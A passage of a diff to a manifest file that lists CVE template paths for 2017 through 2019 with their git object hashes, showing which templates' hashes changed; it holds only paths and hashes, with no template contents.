-http/cves/2017/CVE-2017-18562.yaml:fc05734aaa5062f9b02134840b8cc2ce6a5e4ec2 -http/cves/2017/CVE-2017-18564.yaml:1eb9ac8f5377c73a2409f88ddfe10dc4aed93a6a -http/cves/2017/CVE-2017-18565.yaml:06f07131b688e14a98a3ebeb0542b002351086ef -http/cves/2017/CVE-2017-18566.yaml:13cde74c37e4f970764b0598940b4d417021bb1c -http/cves/2017/CVE-2017-18598.yaml:f5aec52d4dd9d50af0312e1826c1737d0760c65d +http/cves/2017/CVE-2017-18537.yaml:1a8c7654a3767e77b04c5373847117343ef8b9e7 +http/cves/2017/CVE-2017-18542.yaml:69e4b9bcde4a98cfa8e06c3dc033151d89beadde +http/cves/2017/CVE-2017-18556.yaml:2561ca8692cf26d6cabf31c7d770b354ad73e863 +http/cves/2017/CVE-2017-18557.yaml:b708c82f998332bb385284dc014c9ed923e57bf2 +http/cves/2017/CVE-2017-18558.yaml:b0dfcf2f7893c61998b666b4f2fc24ce0e8d2258 +http/cves/2017/CVE-2017-18562.yaml:bb1a3f4d0d172a4ef87c7f9e262fe9e971fea003 +http/cves/2017/CVE-2017-18564.yaml:7812b0b55e9e1924b0070403719766b57a8e9c2b +http/cves/2017/CVE-2017-18565.yaml:ed8635461070c65571def74e0e680405fffe930e +http/cves/2017/CVE-2017-18566.yaml:e4c53378b1b341c85e1c112d28193251388a956d +http/cves/2017/CVE-2017-18598.yaml:5320f8a7a614e44e5e122f614659800d44eeaca0 http/cves/2017/CVE-2017-18638.yaml:5e91379f58e5c4cda0e0863aadc67c71a96d6559 -http/cves/2017/CVE-2017-3506.yaml:501c47b7305b074e4e4662e8ca5361adc6c1dd50 +http/cves/2017/CVE-2017-3506.yaml:13b353f63ac9320996e6a9e689c36b9fd825aa29 http/cves/2017/CVE-2017-3528.yaml:ec01ac21133968ed4d05e0535b7badae0939dc19 http/cves/2017/CVE-2017-4011.yaml:f8387b349e05c712d5e9c5ccfeaf56a80317c75a -http/cves/2017/CVE-2017-5521.yaml:1f871b166451d878454cfe1420e234829035a5d0 +http/cves/2017/CVE-2017-5521.yaml:dfeb13adbe063513afb0e0a9e20735c75b36a20c http/cves/2017/CVE-2017-5631.yaml:64149ea9528e6a81bcde94ef088db0d5f13b7c2d -http/cves/2017/CVE-2017-5638.yaml:b286068db13022e9173f20fdb3d8e75ee88cfdd0 -http/cves/2017/CVE-2017-5689.yaml:46afc751deed3fa7c9a89b625cf3ae9850b4dfa2 +http/cves/2017/CVE-2017-5638.yaml:f5584f9615ea18fdd59489261f4c56d95e569c64 +http/cves/2017/CVE-2017-5689.yaml:f4f12c03b760a4b4ac366ad9c85a1d837813ae54 http/cves/2017/CVE-2017-5982.yaml:2cc9e80970cd0d0f3fddf4e79b615e8f80f945be -http/cves/2017/CVE-2017-6090.yaml:28a7f5964c0e40017259c76c22c343b9b408e323 +http/cves/2017/CVE-2017-6090.yaml:9f28a9f62c945dc5f864d8757be6ab60f458fd73 http/cves/2017/CVE-2017-7269.yaml:f16a7101c1403bd7557b170c713670c640a55c52 http/cves/2017/CVE-2017-7391.yaml:db61bf2e66f06a7be89057d22daa11bdbfcb1d72 -http/cves/2017/CVE-2017-7615.yaml:544655efbd6f5f943d95fd9a26fd3b20ac9c2354 -http/cves/2017/CVE-2017-7855.yaml:2025d3f1021cc307f8e13b7b30ca74ff147fd60c +http/cves/2017/CVE-2017-7615.yaml:abbcf5fdf6e6af3d32908cfbd08b994afdb5ff46 +http/cves/2017/CVE-2017-7855.yaml:2d39e29705928bd779e4b5a2361fff1dade143ab http/cves/2017/CVE-2017-7921.yaml:b64dd053472ec2eb04035ea846e3beeb6db8674c http/cves/2017/CVE-2017-7925.yaml:6924f88514cb1e461f2fd1ea7f5baa463576afbb -http/cves/2017/CVE-2017-8229.yaml:eeb11980a7973dd2da61eca9fe232d19335f3ce5 -http/cves/2017/CVE-2017-8917.yaml:2b87ad15833a904cffe42670982baabff23f0748 +http/cves/2017/CVE-2017-8229.yaml:cc7467a7e4b4388603c22ed1faf98c91d50c3154 +http/cves/2017/CVE-2017-8917.yaml:cdb7df97e6106d6e3cfa7adc102f379a91520557 http/cves/2017/CVE-2017-9140.yaml:20a875398f9abd82dd93831499d71542c3a4306b -http/cves/2017/CVE-2017-9288.yaml:478274a5d684bbc80aa25a00b9a956aa74e328ce -http/cves/2017/CVE-2017-9416.yaml:2a3c8595197d5cee59e0f4b8febe1bab9b3fece5 -http/cves/2017/CVE-2017-9506.yaml:86c635fc621eb33fc42368494ad7cf6482822c9d -http/cves/2017/CVE-2017-9791.yaml:cea858b2e33ea4d51f3f65b977b115c437f63b29 -http/cves/2017/CVE-2017-9805.yaml:1e0855852d5cd8db2a893dc656947515f7a7cd62 +http/cves/2017/CVE-2017-9288.yaml:989901f172026802e6ea8315529ba386fa2e0b16 +http/cves/2017/CVE-2017-9416.yaml:70d53a79be4fc9297aa5b25914086ee6736cc981 +http/cves/2017/CVE-2017-9506.yaml:588d86a70b654acb9c63bb0f106cd5ff64ca4d13 +http/cves/2017/CVE-2017-9791.yaml:411b60741f22a97605e5f57ae807584848fc9a0d +http/cves/2017/CVE-2017-9805.yaml:f1f58af83f6e76ffb185cd8c2b92273b1db7707b http/cves/2017/CVE-2017-9822.yaml:b7cd7ac9df9f7255d7623587b44929abbfe234ad http/cves/2017/CVE-2017-9833.yaml:9d5d145ac854cc5f768170b710d4fb541eb2d6df http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a http/cves/2018/CVE-2018-0127.yaml:9039cbd429767ba7737efdc2496732175ed41e85 -http/cves/2018/CVE-2018-0296.yaml:547da955a5d29ebbb7d0282534d726361c2268d5 +http/cves/2018/CVE-2018-0296.yaml:971bd514bfacf8d493191b60849dc5b2e02347d5 http/cves/2018/CVE-2018-1000129.yaml:7997bbbbf18a5581821e4a53d8efcd0681b6fda5 http/cves/2018/CVE-2018-1000130.yaml:3919e5d1cc90c92b31671f67da4aaa0b9d15cae9 -http/cves/2018/CVE-2018-1000226.yaml:54fc6a14f5da764e2f6edc6138d2f6250d25f189 +http/cves/2018/CVE-2018-1000226.yaml:4c1679ce784d0438897835f4402cad3b843649bb http/cves/2018/CVE-2018-1000533.yaml:b92b15bce22e0a205905d8eb8422d3156f08a00e http/cves/2018/CVE-2018-1000600.yaml:910c040b7e95fb65e496c661906baaf38381897a -http/cves/2018/CVE-2018-1000671.yaml:6ff95a5150e2650b34223428b0c9dc0c54d4ac4e +http/cves/2018/CVE-2018-1000671.yaml:4d5daa15cd4880f0e8f92f3660f028ddb61b9706 http/cves/2018/CVE-2018-1000856.yaml:2aebd84fe344186cc05409d5953ee81536be3052 -http/cves/2018/CVE-2018-1000861.yaml:01d9c5b1f610de0a73651fab839ef717ac56670a +http/cves/2018/CVE-2018-1000861.yaml:e9a6bdd97b5da175c85105885c37188a9831387a http/cves/2018/CVE-2018-10093.yaml:c9b9167e15f9893649b46486f1cd02ddbadcf6af -http/cves/2018/CVE-2018-10095.yaml:16ab4eaf400de007582cbd43ad5740a1d0f0b606 -http/cves/2018/CVE-2018-10141.yaml:b4f7ad829c2f73314e469e6e9c4732f22cd48621 +http/cves/2018/CVE-2018-10095.yaml:21057261b0be73274880980f6f5ddebcd8a321da +http/cves/2018/CVE-2018-10141.yaml:071e25be5d9930bae33fe13fa0f81fc7f5dc6270 http/cves/2018/CVE-2018-10201.yaml:e3825699cee6c241f0a763a3d9d3eb0c07723d9c -http/cves/2018/CVE-2018-10230.yaml:037412173088644cfa9dfa9e50ccd3a44577e0cc +http/cves/2018/CVE-2018-10230.yaml:021be4ffd2a341a251c9a75c0e75cfdbe420e4d8 http/cves/2018/CVE-2018-10562.yaml:990e4f11aa8b166e606a477f9913e2da7921179f -http/cves/2018/CVE-2018-10735.yaml:7f6de3438dbf42c426418df6e4d002a6769bd22a -http/cves/2018/CVE-2018-10736.yaml:671fb31ecf0cd962cb762b6355cdf2fcbd656152 -http/cves/2018/CVE-2018-10737.yaml:a6b4fdfd336b2f5a194eef4d2b8c8909e8d541bb -http/cves/2018/CVE-2018-10738.yaml:f02f1a13c9e007d0e21285a0a9f5c31fcbe3752e +http/cves/2018/CVE-2018-10735.yaml:fe665711187547b1cbf8cbabba415808a22cc762 +http/cves/2018/CVE-2018-10736.yaml:9831cfd63f8c82a2a5f78f94e22fea49e0c83904 +http/cves/2018/CVE-2018-10737.yaml:4fbabb0bb88fcbaae958e0817c01ff9f0379d00f +http/cves/2018/CVE-2018-10738.yaml:347a51284f7edd6ddd9ebca5098593af2a999c9d http/cves/2018/CVE-2018-10818.yaml:efa3271174cdf4babcac2932f09ca4d5e35b49d2 http/cves/2018/CVE-2018-10822.yaml:7f0a230ae784c9666bb8be847c4b06e77ecf6a28 http/cves/2018/CVE-2018-10823.yaml:a5d4167b803821e0149da4c0ef358976f59ab9a0 -http/cves/2018/CVE-2018-10942.yaml:00dd49ed7a5a2c896bc4c31613aaddbe7ba9993e -http/cves/2018/CVE-2018-10956.yaml:58a74835e84d6dd4caca8a54fd804440b41ddf5a +http/cves/2018/CVE-2018-10942.yaml:4bbbbe89e5944890237f4d4bd963b98ec4704585 +http/cves/2018/CVE-2018-10956.yaml:aa791cd0add39db6bdec3a37cc0fb7a40333163f http/cves/2018/CVE-2018-11227.yaml:53df328cd18067c2bfc7a54db4c082c74c882368 http/cves/2018/CVE-2018-11231.yaml:51626c805600f217d4c3eb66418488e1e9b39398 -http/cves/2018/CVE-2018-11409.yaml:033638ca40ac0bd0b40cc9c0580d9ae710870260 +http/cves/2018/CVE-2018-11409.yaml:426f43164fa08273ad8cec96af90e2f706df06f6 http/cves/2018/CVE-2018-11473.yaml:d9d4a345254b353f60f767a76a59fa107d608d78 http/cves/2018/CVE-2018-11709.yaml:2182a3c38d7b41f6b6b36a9722623d47260d55c7 -http/cves/2018/CVE-2018-11759.yaml:b972972db8d4d0f9fc9b0619087531d3a8b8cf06 -http/cves/2018/CVE-2018-11776.yaml:c5a8cf5b03b08247dc9dbfabda18c7243a28ae51 -http/cves/2018/CVE-2018-11784.yaml:22a23938cbc3bd21f5609b50d5412703e1a34fec +http/cves/2018/CVE-2018-11759.yaml:d72db73359e51706b5ed95644194424029b72076 +http/cves/2018/CVE-2018-11776.yaml:05a2a59a31acbc34b2a2081c57d64982ecc4d41e +http/cves/2018/CVE-2018-11784.yaml:ccc6f21f45cd6439db8d8a4020648cd651abcc52 http/cves/2018/CVE-2018-12031.yaml:4779e625bb9ad13c228b5b2dff9d04338aea3aed -http/cves/2018/CVE-2018-12054.yaml:d2c4275fe1a5bd855f9b3da99b0a01fb9f6011d3 +http/cves/2018/CVE-2018-12054.yaml:d06fd445beaa655a75df69958de63025a4c1fc95 http/cves/2018/CVE-2018-1207.yaml:d725ed522674e6fe25fe4a413ecba7fe32a1b864 http/cves/2018/CVE-2018-12095.yaml:7c6d4a16cc5c42673c2f23abb768466b6164d306 -http/cves/2018/CVE-2018-12296.yaml:1228dd53ee62d06e060e54c723892c20eb94ff85 +http/cves/2018/CVE-2018-12296.yaml:d2a1334c577f069c44bd07200c8b50daac9c4c25 http/cves/2018/CVE-2018-12300.yaml:4283bdec4127f673c9c0329179a3a915fc902327 -http/cves/2018/CVE-2018-12613.yaml:bd0f95bbd36fd69b9130ecc86181ee9dee0895c9 +http/cves/2018/CVE-2018-12613.yaml:43e959c9d796fae29148b78dcafc18ce5c60bd14 http/cves/2018/CVE-2018-12634.yaml:1cb589cfbe1c1461e84b764f5c4edfa93bb04456 http/cves/2018/CVE-2018-12675.yaml:1019e2a9376f55ef9d0bdf1cedc261fd161623b6 http/cves/2018/CVE-2018-1271.yaml:99a76e403443736e179bba2bd58ad87e6e8d556e -http/cves/2018/CVE-2018-1273.yaml:db8008442b014c0912e46eca9a3724cef5e5d8b5 -http/cves/2018/CVE-2018-12909.yaml:541bf103b6bae43460840fd26d126691cbd231c0 +http/cves/2018/CVE-2018-1273.yaml:2038a3ee0967454c4da0d008a669aceb5b1fcf32 +http/cves/2018/CVE-2018-12909.yaml:b5b5be51154e71e2f8bac7ad5d85b67582431c16 http/cves/2018/CVE-2018-12998.yaml:47f498dbb37559c753c8fac62600c63ff9a9c791 http/cves/2018/CVE-2018-1335.yaml:fc3469df3a3c51ef4f52a76101fbbc68697c4778 -http/cves/2018/CVE-2018-13379.yaml:2381237006e0f5ca12a77695db931b9b5b2a637e -http/cves/2018/CVE-2018-13380.yaml:d73e1b06d5584eb6e7247530652ab5443dcd768c +http/cves/2018/CVE-2018-13379.yaml:1559d7ff47172de680a9811b7031104dbc313cac +http/cves/2018/CVE-2018-13380.yaml:243c0c5de4e8ba7f359728580f2bc3965cb012d2 http/cves/2018/CVE-2018-13980.yaml:6eb4159b100f832aecbabfb6cef291ef5a910cbf -http/cves/2018/CVE-2018-14013.yaml:cbba1470ba2121590d997cc2df4f427edaaa8ba3 -http/cves/2018/CVE-2018-14064.yaml:e5029142dfb2b8b0d99b1cc467f23c16eafda6f8 +http/cves/2018/CVE-2018-14013.yaml:3c80ad309ad3760ddba2954374d13ae0ca35b17e +http/cves/2018/CVE-2018-14064.yaml:58e648400261f6d0274ce54555609aa5c38584e7 http/cves/2018/CVE-2018-14474.yaml:14147a463e7df9164542239aab9693365cc552d3 http/cves/2018/CVE-2018-14574.yaml:08cc9b9112b8242b5ed426aa9a016ffaee8351fa http/cves/2018/CVE-2018-14728.yaml:3005fff6268e3e0079028fc907bcad293f3d69fa -http/cves/2018/CVE-2018-14912.yaml:a7cc022cc943f430819a09cc37f2fab634f4cda9 +http/cves/2018/CVE-2018-14912.yaml:623c3d687f080cdf58f35f1e9fda2f353144013d http/cves/2018/CVE-2018-14916.yaml:e395335963bef34ab111725bb0d36d5a69f06780 -http/cves/2018/CVE-2018-14918.yaml:6f72cb8666ce96de5914071a76cdcb68cb842784 +http/cves/2018/CVE-2018-14918.yaml:179414869e202df87ce0c08439159ec0bde682b1 http/cves/2018/CVE-2018-14931.yaml:faa048b946e4befdd3f55328fe9a3d1218ffe567 -http/cves/2018/CVE-2018-15138.yaml:e2b922f0ae02891d301de48957efbcdba06d4caf +http/cves/2018/CVE-2018-15138.yaml:06a153d3ef8404fb730ed3a0929867741346553a http/cves/2018/CVE-2018-15517.yaml:12e36b24ee809c6e164212d693481a55f58b1130 http/cves/2018/CVE-2018-15535.yaml:bfad4720c9ee69d05e8103533e4f856185d62e66 http/cves/2018/CVE-2018-15745.yaml:448c292479d27f7426b8d45acb2dc8c24dac1ba8 -http/cves/2018/CVE-2018-15917.yaml:2260f4b6625577f43d2ad2379b9da2dd1fabb4d0 -http/cves/2018/CVE-2018-15961.yaml:b5d40974ca6796a98a9b98a74b71b6fb8611f91c +http/cves/2018/CVE-2018-15917.yaml:15a3a00edf08eec8b74cfe90ae6c4f02d8c5f872 +http/cves/2018/CVE-2018-15961.yaml:91a77b00d5c5fa3206a98ec5fc3916e053ac1ba3 http/cves/2018/CVE-2018-16059.yaml:992cc116f8f261abd69f4cb5b9934ce00d83e8e0 http/cves/2018/CVE-2018-16133.yaml:c01d3089c2ebbe72dfe0e54eb3e5c8626e19d362 -http/cves/2018/CVE-2018-16139.yaml:cb97a42847998052f5be66e5e409bf6cd989e6b4 -http/cves/2018/CVE-2018-16159.yaml:396bae370ddebcd8b72ba9db58e3a2e836ea3322 +http/cves/2018/CVE-2018-16139.yaml:621dfc938dd3ae3ed95b76fb8c49f4fbc5b4e27f +http/cves/2018/CVE-2018-16159.yaml:a7a6a3ae41061f987b2008974fab416383f5a90a http/cves/2018/CVE-2018-16167.yaml:176a380e5945ac18fc326e04621f5d433fa876a6 http/cves/2018/CVE-2018-16283.yaml:cd7733e319cc2abbe92fcc06861eed211c030486 http/cves/2018/CVE-2018-16288.yaml:28a0c7098ffd27a2ab982d73c4f5b71abd27f539 http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb -http/cves/2018/CVE-2018-16668.yaml:4eb79088a3d726e6bb79eeb26c08c7c2ac469050 +http/cves/2018/CVE-2018-16668.yaml:0ff10e0e1d34a7c6571914ab72a12af160f2c7a9 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a http/cves/2018/CVE-2018-16671.yaml:906368ef356b2b4c8965f8046fd49dbef0dd821f http/cves/2018/CVE-2018-16716.yaml:18f0e3db7969f3773f0483a9d82b30dc976e5459 @@ -1460,121 +1460,121 @@ http/cves/2018/CVE-2018-16979.yaml:ac6f5cfd3090ba52cea4db62eb8719cbff2b0558 http/cves/2018/CVE-2018-17153.yaml:5cdbe44c616d3ea36184bee2460031b569d362a0 http/cves/2018/CVE-2018-17246.yaml:fe7a3e41ef31e8f761f3df652a564aae3997bbd6 http/cves/2018/CVE-2018-17254.yaml:63a99c6884bcb88c9d81a6d95136c007f8296cf6 -http/cves/2018/CVE-2018-17422.yaml:97bb02a34b57f5379f0832f2b3ebc18910bec4d9 +http/cves/2018/CVE-2018-17422.yaml:ee0c028b7a6bbd7f0ad9492826df1e11cfc3a9b2 http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 http/cves/2018/CVE-2018-18069.yaml:fb55c1c8a6544261d3da494f50ffe75d12262d5c -http/cves/2018/CVE-2018-18264.yaml:b604f10f5a5943aed5adbad251c29d2e5c96979e +http/cves/2018/CVE-2018-18264.yaml:22473d7c73a3bf92f029d8f0c97bd438247b7fec http/cves/2018/CVE-2018-18323.yaml:b10bf4b2ae8e13371ebf965fc3483d3d84a40bdd http/cves/2018/CVE-2018-18570.yaml:b798a41cb7e50801d3a488617513cb1b50c6c790 -http/cves/2018/CVE-2018-18608.yaml:8459db3f1f0f34be9ad4fa337bf84fc2a824e29f +http/cves/2018/CVE-2018-18608.yaml:359014b06168d77454de612d3f99d9897f953262 http/cves/2018/CVE-2018-18775.yaml:6855fbb7653fb75ebfb58a92e13a94bddd6363e7 http/cves/2018/CVE-2018-18777.yaml:ea3dae45b965ecb5c04b58193b4d02c42b35f99a -http/cves/2018/CVE-2018-18778.yaml:345345f22b91b7718f170610f99da622f2ac9d34 -http/cves/2018/CVE-2018-18809.yaml:1f7763fa493ca0d15696e5b3295e709d8ba7225d -http/cves/2018/CVE-2018-18925.yaml:b1fd3177d88d9ffb062160bf5bf78f8448970b11 +http/cves/2018/CVE-2018-18778.yaml:15d490c3a815cde2d7b41de4bf9293413c37eb6a +http/cves/2018/CVE-2018-18809.yaml:bacbd73be899c4319544df580c538b31ef7ed112 +http/cves/2018/CVE-2018-18925.yaml:8b48587824520a669610a371b4912e8a92e4bca9 http/cves/2018/CVE-2018-19136.yaml:2cdceec8a347290659292d34e7f91f97f8e8671e http/cves/2018/CVE-2018-19137.yaml:10f56626df0c7fa74817bc38fef21ab7da2bb199 -http/cves/2018/CVE-2018-19287.yaml:33842e2c13500ace90d63f3e5ff94015026c7f2b -http/cves/2018/CVE-2018-19326.yaml:96578e44556f708d4e12da4314d88b194986ca78 -http/cves/2018/CVE-2018-19365.yaml:1b0bd4e795aa22cfffdaf69aa3db36e1b1de7735 +http/cves/2018/CVE-2018-19287.yaml:b2c343cf151c994f7066fdc3f4b373b87b0062ca +http/cves/2018/CVE-2018-19326.yaml:17a7731f7f93be0d6cba147abba011db87e9d887 +http/cves/2018/CVE-2018-19365.yaml:43dbde14b68827ffa60428a46ffd211d144b5ffa http/cves/2018/CVE-2018-19386.yaml:521152286d482dead5c0d91b75d6246646629049 http/cves/2018/CVE-2018-19439.yaml:44f03cecf9c0742b6658b1c454bbd93724aa96c4 http/cves/2018/CVE-2018-19458.yaml:565726e6eeb6e8b7c405013cee2c313b909fa120 http/cves/2018/CVE-2018-19749.yaml:28104dd3a487cd17227ce25cc9338dff9c08cfde -http/cves/2018/CVE-2018-19751.yaml:236b46333b4516ff33df4e91bc1d787a78f7d947 +http/cves/2018/CVE-2018-19751.yaml:3f53ebf5406a89a7e3e11752ced8813012853a93 http/cves/2018/CVE-2018-19752.yaml:71e38315bba3bb99c68bb98ae47546e3a8852636 http/cves/2018/CVE-2018-19753.yaml:20eac71a3629c82df03f7b5d5221e06b8b89b8c2 -http/cves/2018/CVE-2018-19877.yaml:bf900a8a82f85573f3e4c9e8c3d007e286e5508e +http/cves/2018/CVE-2018-19877.yaml:aa95eb258b3203718e04b6e7c68b658c3b508f23 http/cves/2018/CVE-2018-19892.yaml:b0823b9b53093ad710fc09dbdb2e78790f92a200 http/cves/2018/CVE-2018-19914.yaml:a114f893cf8568e67d37bc14ffe7873fa217c612 http/cves/2018/CVE-2018-19915.yaml:1611fce07118e7ebc351f355cfdb0433425c89b1 http/cves/2018/CVE-2018-20009.yaml:ee1015fa79e95b36c728126336f745c57b8234cd -http/cves/2018/CVE-2018-20010.yaml:9959fb357088a02f52f318e63de6346a72fc570f +http/cves/2018/CVE-2018-20010.yaml:689c085c36a9cdc82f4de17adc10f5d73237100a http/cves/2018/CVE-2018-20011.yaml:98950dff4dbf42b3759537438082d4166c789270 -http/cves/2018/CVE-2018-20462.yaml:3bfc695969e7bc9a10279967cb80f7e5ff3d91cb +http/cves/2018/CVE-2018-20462.yaml:292a2ceb3c73d33c3ba3fbec9d1fdb2266b78837 http/cves/2018/CVE-2018-20463.yaml:9712578b99f890b278c05e83cce8bf9ab31cf93f http/cves/2018/CVE-2018-20470.yaml:ea3915d1ed278c8a4cbd4f954db50271ba8356f3 -http/cves/2018/CVE-2018-20526.yaml:e0821c15d241d3386b9f39f70e686206e141407b +http/cves/2018/CVE-2018-20526.yaml:2e05510cc3547f9591db77670407ed491fd38a28 http/cves/2018/CVE-2018-20608.yaml:92c17d1974d5042e036f5bfebf8cb2b0fe669c34 -http/cves/2018/CVE-2018-20824.yaml:d105e7bc49183cbe5c9f1c10ef9712f86b8178ca +http/cves/2018/CVE-2018-20824.yaml:d22fe36502bd446b8805b9812de5ee273dfa184c http/cves/2018/CVE-2018-20985.yaml:4bb634eec7d3375bcddca14b53c76512eba48045 http/cves/2018/CVE-2018-2392.yaml:b0dfd0dc15a700e7739aaea55f5d5aa6fb45b61c http/cves/2018/CVE-2018-2791.yaml:31136b756dcfeb64b3f98823a29b78db51519f5b -http/cves/2018/CVE-2018-2894.yaml:9aa7f6bacd7da0d44a9ede18e8fe426d8ea7fb9a +http/cves/2018/CVE-2018-2894.yaml:59427428a0c7a92f1d7a821b4afbbb05f7649c74 http/cves/2018/CVE-2018-3167.yaml:248b1742e31ca65c14d9ae9a070849d9850b077f http/cves/2018/CVE-2018-3238.yaml:290f44dd8265304d0a28fe5a8814b51d8a7a3a56 http/cves/2018/CVE-2018-3714.yaml:467fa520a83d33a07e51718f5bcb3c358beea1d4 http/cves/2018/CVE-2018-3760.yaml:90f7093f1e64c13dea1afaee2fe85b1fcef938ff http/cves/2018/CVE-2018-3810.yaml:2d56de0a9b2c76b6aad57d50302dbcf26a90e6b2 -http/cves/2018/CVE-2018-5230.yaml:c57978d17df273f0897969aaad1f4985e575b730 -http/cves/2018/CVE-2018-5233.yaml:e800c69052a11c137e03ac87e57691ace036ce4a +http/cves/2018/CVE-2018-5230.yaml:eadbeb24cfc2bb161410a61e191ce6236469ddf9 +http/cves/2018/CVE-2018-5233.yaml:09a0d8566d3b4daa0f1ace8da6f2a1f55fd0bed1 http/cves/2018/CVE-2018-5316.yaml:fe0e4112fa6a7f2918925dff5501b19680026501 -http/cves/2018/CVE-2018-5715.yaml:ac6f6ac7ac3de100cb069081bc64a1e33ede4ec6 +http/cves/2018/CVE-2018-5715.yaml:c470cb4eaea25753a09ec1262cbae3cb5a9918cd http/cves/2018/CVE-2018-6008.yaml:d9b979c4b3813f317c2efe8206d4e8a5b1215e3e -http/cves/2018/CVE-2018-6184.yaml:29400990ed3b50192d9839bcc4080bdf1b066868 -http/cves/2018/CVE-2018-6200.yaml:88a53dfc13b0fd0254dcb6bf9dc619e09c91b495 -http/cves/2018/CVE-2018-6530.yaml:db4546ccfe19beaf259c40d828e0ae8949f094a3 -http/cves/2018/CVE-2018-6605.yaml:dfe8c1b4bfe464a251889ec34a6cb0c0aacf312d -http/cves/2018/CVE-2018-6910.yaml:9092a097d0bdb732c53003552513ce216fe13369 +http/cves/2018/CVE-2018-6184.yaml:dbd8877aea2694cd2c6f3ef12bdefb113f1512b9 +http/cves/2018/CVE-2018-6200.yaml:3e6473129d625093af721e2e6cac53ac702aa99c +http/cves/2018/CVE-2018-6530.yaml:c9f5fd5828e6825e4e2429b612b21820ef7e8e48 +http/cves/2018/CVE-2018-6605.yaml:4c52ab31c5528441d5cdb88b6da9eee6ee7197e0 +http/cves/2018/CVE-2018-6910.yaml:1662c242773d5c5b17b063fd3f30a958c575b8bd http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 -http/cves/2018/CVE-2018-7282.yaml:685d96189b0ef30acb41d198afeacc915ba2f1ef -http/cves/2018/CVE-2018-7314.yaml:5f52f2777c68b2c1b66e88a2bd6aa228adce2fad -http/cves/2018/CVE-2018-7422.yaml:a130447be6cf9891b897796ad7e93263681d111c +http/cves/2018/CVE-2018-7282.yaml:be0c74b3dbba955d79d30c81b2fdc9e89502a91b +http/cves/2018/CVE-2018-7314.yaml:dfed8b8206e6720d6d51363adc96f9ba89368e76 +http/cves/2018/CVE-2018-7422.yaml:abb5ddf40bfea031bcdf4b40cb2bb8cc8bfa5653 http/cves/2018/CVE-2018-7467.yaml:1b0142f9c76787034d813d1cb3bf1d803ab77c63 http/cves/2018/CVE-2018-7490.yaml:569286ff6beffe744aed0915b8d887e6921ee84b -http/cves/2018/CVE-2018-7600.yaml:a508c10b70d82b0f3d829a14bda447d2575cf419 -http/cves/2018/CVE-2018-7602.yaml:641384235e3b1e674c1d1c90a3010684bf32f261 -http/cves/2018/CVE-2018-7653.yaml:bded3e99b23fcc45db52479f46a331c30e0e0e09 +http/cves/2018/CVE-2018-7600.yaml:7ec4b566a2bfa95030e416d58a9bfd17924080c3 +http/cves/2018/CVE-2018-7602.yaml:4430bbbbd6c01e4c9c490a0eb547d6d49a512b35 +http/cves/2018/CVE-2018-7653.yaml:d689813ab1f3a9afefec7e7f395b9db19fe79ab6 http/cves/2018/CVE-2018-7662.yaml:f227ce3aa502c6302dbe55932d703c645119b1c6 -http/cves/2018/CVE-2018-7700.yaml:a6fbf04288ae18b2a24d9ed42e401444a650d13c +http/cves/2018/CVE-2018-7700.yaml:6a4ea5679d54c4bc638e0285403ce88af9aec481 http/cves/2018/CVE-2018-7719.yaml:47cab26137d85e8909949d13e765303fb157f35e -http/cves/2018/CVE-2018-8006.yaml:4a6ac001f0876c85d01f2b4426ae7993622f7379 -http/cves/2018/CVE-2018-8033.yaml:069361da62a9fee5d3c1f3ecde881aecea7192a6 +http/cves/2018/CVE-2018-8006.yaml:b12220de45fb556252d9d5d2701cef74d48d8c54 +http/cves/2018/CVE-2018-8033.yaml:2afd137ec0293a2c9b79724248921f37f008906f http/cves/2018/CVE-2018-8715.yaml:d4851d7cc81088c538c4f3b2a73af93400e44e0e http/cves/2018/CVE-2018-8719.yaml:78364732d8025f076c2a124f70afd3e5bd934968 -http/cves/2018/CVE-2018-8727.yaml:27f534aaa7fb7c777126f34c95909bb61e6621e9 -http/cves/2018/CVE-2018-8770.yaml:ec6ad882d9d54f409802bbeab09118fe4766d808 -http/cves/2018/CVE-2018-8823.yaml:754907883c75212da4903f7176b090bf307f3bca +http/cves/2018/CVE-2018-8727.yaml:15629ce09bbf792bd261ee06eb09b459ab1b3504 +http/cves/2018/CVE-2018-8770.yaml:cfc64951668cc27df735dbc47cd8c2e6c2fc2e4f +http/cves/2018/CVE-2018-8823.yaml:b6cfcd295a432160b0d50068d0d4a0df4dd2a581 http/cves/2018/CVE-2018-9118.yaml:4c13276c78e4d2e73f19a54a77115b4c4a48aae6 http/cves/2018/CVE-2018-9161.yaml:f98357d745d30e54b9a0f949e05f38ae29148319 http/cves/2018/CVE-2018-9205.yaml:1499d18423846d499f720c4264a44ad75f27f93f -http/cves/2018/CVE-2018-9845.yaml:544155d4176620f3a59236ff1c27d402be5f8a87 +http/cves/2018/CVE-2018-9845.yaml:722b567e210ca532878895287f02ccfb1a0a32f1 http/cves/2018/CVE-2018-9995.yaml:1acb8eb87312ef544059faa23df771316f81e41d -http/cves/2019/CVE-2019-0193.yaml:31cf560767e5d39ef11b5b2c8e528f7e3b339669 -http/cves/2019/CVE-2019-0221.yaml:c096b3812463e72b66e91915c8a7303c2c5aa0da -http/cves/2019/CVE-2019-0230.yaml:71b387fc91dcacf38555fdfd7a2f384f11f82ba1 +http/cves/2019/CVE-2019-0193.yaml:85ff71a8d757cd8e6085526c56db1ee8902d870e +http/cves/2019/CVE-2019-0221.yaml:98dd2dd8bf4acddefec1614032c5a4e68a4c58c0 +http/cves/2019/CVE-2019-0230.yaml:abac62a93b0325111c3fb7ee826601157f8978bb http/cves/2019/CVE-2019-10068.yaml:490f5b18e6a9df7eea47ff5973a4ef6917eb3e84 -http/cves/2019/CVE-2019-10092.yaml:1b7c312d6b6d3fc2fd03c9c5053f62837215fb54 -http/cves/2019/CVE-2019-10098.yaml:f135aed03cc212d711adf1dc9f69dc15150f7117 -http/cves/2019/CVE-2019-1010287.yaml:4c4caaa3595c2c767665b33a94660216908b650a +http/cves/2019/CVE-2019-10092.yaml:f83e1958d6881852f980757cb77e70178ae2d56c +http/cves/2019/CVE-2019-10098.yaml:cca98e973fbd172d913abfb3f98c972183a9e6c6 +http/cves/2019/CVE-2019-1010287.yaml:d2e19f76cc15ce6ed0eb9445a2b813b79e031652 